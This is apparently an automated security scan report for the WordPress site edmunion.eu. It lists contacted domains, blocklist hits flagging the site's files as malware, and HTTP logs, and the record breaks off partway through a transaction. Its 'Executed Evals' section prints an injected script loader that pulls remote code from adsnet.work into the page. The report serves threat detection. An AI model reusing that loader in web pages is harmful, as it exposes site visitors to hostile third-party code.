Overview

URLedmunion.eu/
IP 77.240.112.203 (Spain)
ASN#16371 acens Technologies, S.L.
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-11-04 20:42:32 UTC
StatusLoading report..
IDS alerts0
Blocklist alert22
urlquery alerts No alerts detected
Tags None

Domain Summary (13)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
edmunion.eu (1) 0 2016-10-13 18:05:22 UTC 2022-11-04 05:35:10 UTC 77.240.112.203 Unknown ranking
r3.o.lencr.org (8) 344 No data No data 23.36.77.32
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
www.edmunion.eu (33) 0 2017-02-20 06:29:34 UTC 2022-10-15 07:50:19 UTC 77.240.112.203 Unknown ranking
fonts.gstatic.com (3) 0 2014-09-09 00:40:21 UTC 2022-11-04 10:24:09 UTC 216.58.207.195 Domain (gstatic.com) ranked at: 540
fonts.googleapis.com (3) 8877 2013-06-10 20:14:26 UTC 2022-11-04 17:35:41 UTC 142.250.74.10
ocsp.digicert.com (3) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-11-04 05:51:42 UTC 34.117.237.239
ocsp.pki.goog (9) 175 2018-07-01 06:43:07 UTC 2020-05-02 20:58:16 UTC 142.250.74.35
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.42.234.253
adsnet.work (1) 0 2015-06-06 16:23:15 UTC 2022-11-02 18:40:40 UTC 193.3.19.36 Unknown ranking
img-getpocket.cdn.mozilla.net (7) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
hydrahydra.kim (1) 0 2021-10-19 18:50:29 UTC 2022-11-03 09:50:45 UTC 193.3.19.36 Unknown ranking

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-04 2 edmunion.eu/ Malware
2022-11-04 2 www.edmunion.eu/ Malware
2022-11-04 2 www.edmunion.eu/wp-includes/js/wp-emoji-release.min.js?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/lity/lity.min.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/css/new-style.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-includes/css/classic-themes.min.css?ver=1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/css/slick.min.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/font-awesome/css/font-awesome.m (...) Malware
2022-11-04 2 www.edmunion.eu/wp-includes/css/dist/block-library/style.min.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/css/front_end/dummy.cs (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/css/front_end/content_ (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/content_elements_misc/ (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/content_elements_misc/ (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/bootstrap.min.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/jquery.circliful.min.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/jquery.downCount.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-includes/js/jquery/jquery.min.js?ver=3.6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/lity/lity.min.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/denorious-main.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-includes/js/comment-reply.min.js?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/scrolltotop/totop.js?ver=1.0.0 Malware
2022-11-04 2 adsnet.work/scripts/placer.js Malware

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 1 reports on IP: 77.240.112.203
Date UQ / IDS / BL URL IP
2022-11-04 20:42:32 +0000 0 - 0 - 22 edmunion.eu/ 77.240.112.203


Last 5 reports on ASN: acens Technologies, S.L.
Date UQ / IDS / BL URL IP
2023-02-01 15:57:53 +0000 0 - 3 - 0 afinad.biz/ 82.194.68.67
2023-01-29 19:45:31 +0000 0 - 2 - 0 www.flexshoppingcenter.com/wp-admin/includes/ (...) 82.194.68.52
2023-01-29 15:18:45 +0000 0 - 8 - 0 app.wannacash.com/r1/1964587/25/qqiipf 77.240.115.205
2023-01-28 14:36:00 +0000 0 - 1 - 0 campus.funiber.org/nutriber/Instalador.exe?_g (...) 217.116.15.70
2023-01-27 15:19:00 +0000 0 - 1 - 0 campus.funiber.org/nutriber/Instalador.exe?_g (...) 217.116.15.70


Last 1 reports on domain: edmunion.eu
Date UQ / IDS / BL URL IP
2022-11-04 20:42:32 +0000 0 - 0 - 22 edmunion.eu/ 77.240.112.203


No other reports with similar screenshot

JavaScript

Executed Scripts (21)

Executed Evals (1)
#1 JavaScript::Eval (size: 195) - SHA256: d1255c9406d7ac6d3d53f2d0462c087b20576eb1a3f57d7eb0c1d1ee5b228fd2
var script = document.createElement('script');
script.onload = function() {};
script.src = "https://adsnet.work/scripts/placer.js";
document.getElementsByTagName('head')[0].appendChild(script);

Executed Writes (0)


HTTP Transactions (72)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         77.240.112.203
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 162
Connection: keep-alive
Location: http://www.edmunion.eu/


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B93410A9D62DA3F219796D753B61A0F730CC272C13596724AA9D20EFBA298B44"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5608
Expires: Fri, 04 Nov 2022 22:15:49 GMT
Date: Fri, 04 Nov 2022 20:42:21 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5979
Cache-Control: max-age=138503
Date: Fri, 04 Nov 2022 20:42:21 GMT
Etag: "6364dbd9-1d7"
Expires: Sun, 06 Nov 2022 11:10:44 GMT
Last-Modified: Fri, 04 Nov 2022 09:31:05 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5979
Cache-Control: max-age=138503
Date: Fri, 04 Nov 2022 20:42:21 GMT
Etag: "6364dbd9-1d7"
Expires: Sun, 06 Nov 2022 11:10:44 GMT
Last-Modified: Fri, 04 Nov 2022 09:31:05 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "73A068F907CC50DD60AF18D545B4264DD44BC4B9F40BF9ADFCEEA157FDC33099"
Last-Modified: Thu, 03 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9718
Expires: Fri, 04 Nov 2022 23:24:19 GMT
Date: Fri, 04 Nov 2022 20:42:21 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: cPN02Ux7I16fmzILN21UChAT+u1FvNe/j9CO2pFvCtXF9GKzQpm3fFLJTsTx+7ISAhg7oHm76MM=
x-amz-request-id: DS5SWMH4WHBPYBN1
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 04 Nov 2022 19:46:54 GMT
age: 3327
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    67d5a988edcda47bc3b3b3f65d32b4b6
Sha1:   d4f0e0da8b3690cc7da925026d3414b68c7d954f
Sha256: 55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 04 Nov 2022 20:42:21 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET / HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 46334
Connection: keep-alive
X-Pingback: http://www.edmunion.eu/xmlrpc.php
Link: <http://www.edmunion.eu/index.php?rest_route=/>; rel="https://api.w.org/", <http://www.edmunion.eu/index.php?rest_route=/wp/v2/pages/2>; rel="alternate"; type="application/json", <http://www.edmunion.eu/>; rel=shortlink
X-Powered-By: PHP/7.4.32, PleskLin


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (9381), with CRLF, LF line terminators
Size:   46334
Md5:    1d2e19bb632f7021564086e7cb83dc76
Sha1:   febb7103fba547542650f4fbcad36d1c9370c27e
Sha256: ed09ef38fcc74089a6b668f1d5a4eff741eaeacd4ab7c29d88d6ad20844469e8

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:21 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:21 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:21 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 18617
Last-Modified: Wed, 25 May 2022 00:45:28 GMT
Connection: keep-alive
ETag: "628d7c28-48b9"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (15660)
Size:   18617
Md5:    32beb68a374e3aeac00abdf9e12b84ea
Sha1:   b5d18aa625e8696dd9d07cd0869337717b211ae0
Sha256: 5aad5fbd4238981a9ff5e2772ff1353dfe1a801fb49542fe157418c1438f7782

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/lity/lity.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 3349
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-d15"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (3288), with CRLF line terminators
Size:   3349
Md5:    a89216bdb476bff1f1e4096bab4df235
Sha1:   a0651cb4bf0af858c55f5564360584d8af19978e
Sha256: 3a37f82bdd6c846240ab0762b6fbda3d5b4baa60dbef3287792b00bb9fe8e7c0

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/css/jquery.circliful.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 886
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
ETag: "376-56695f8083140"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   886
Md5:    b4a6416d3ee6a9e5685066fa0d4a733f
Sha1:   4bb15d611533596e602ab5e2bbea18393f70e510
Sha256: c600045104a8b512eaa59d1f3ef5fae13b712899d7d82eb93a9ba6b5ae160767
                                        
                                            GET /wp-content/themes/denorious/css/new-style.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 8746
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-222a"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   8746
Md5:    326883fa2b5eb5684897076e2d028b53
Sha1:   7f323d0bc6c7812310b129618764b47c5d1dd3df
Sha256: a67d285847fc3b8f704e29629bffb72ceeec9adc59b74855025deec41de77d0c

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 217
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Wed, 02 Nov 2022 01:45:15 GMT
ETag: "d9-5ec72fdfd3c03"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  ASCII text
Size:   217
Md5:    95e891f28e44a9b314c09545d86be2b7
Sha1:   f9b13a8bd47273b086a0a07df15f314e0af0bc3e
Sha256: 5a5f39391fbf5b06db84b8f9716d53de575ee97a627d2c5f12f79a991a671eb5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/css/slick.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 1290
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-50a"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (1290), with no line terminators
Size:   1290
Md5:    19d947f5a564794121cba0e962520b68
Sha1:   41e81b392d26a4aaaf9fda074d1ed2d802f2d6a8
Sha256: 8f24862077717aa659bc9f521e03cd8dbb013fcae88a3eff5a3824a064c92029

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/font-awesome/css/font-awesome.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 22096
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-5650"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (21880), with CRLF line terminators
Size:   22096
Md5:    3aae6eb815f965c9bfc0f583fcfae4e8
Sha1:   9f78b698a990bb613395b8fab62f798f271c87be
Sha256: 71dd9e4d26b8f059c03e489be1f506177affa87c91cb5150657a423739a9fa7e

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/slick/slick.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 1729
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-6c1"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   1729
Md5:    13b1b6672b8cfb0d9ae7f899f1c42875
Sha1:   6e9d13342a11a8cfd9e42ee243eaeae01cda4e25
Sha256: d917660c3d6f7aad32ebc4b0012c6d0bb84a13e201a012e334bcca4b9f4686c9
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 94821
Last-Modified: Wed, 02 Nov 2022 01:45:15 GMT
Connection: keep-alive
ETag: "6361cbab-17265"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (47826)
Size:   94821
Md5:    4cdcd4a2c77fccb74825eaf2d6733091
Sha1:   00d4ad404f681af9044bb4cc6ed5e2e9f641cc4a
Sha256: 187af6783dd59cd3b9dd90e77b3daa1509c1c3c18f5ce5d6fe2133f9bc3828df

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5722
Cache-Control: max-age=133188
Date: Fri, 04 Nov 2022 20:42:21 GMT
Etag: "6364c817-1d7"
Expires: Sun, 06 Nov 2022 09:42:09 GMT
Last-Modified: Fri, 04 Nov 2022 08:06:47 GMT
Server: ECS (ska/F705)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /wp-content/plugins/bold-page-builder/css/front_end/dummy.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 0
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
ETag: "0-57d046ddb8f00"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-content/themes/denorious/style.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

search
                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 169350
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-29586"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   169350
Md5:    503d50f5679c93078a55699b93bf125f
Sha1:   9a3170804c495ddd24fa1e0771c00c7dac9a6e03
Sha256: 222ba21e54eb3c1e2a7ba146d4141558468a53eaf3a9f0bffbef6aa20fede378
                                        
                                            GET /wp-content/themes/denorious/css/bootstrap.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
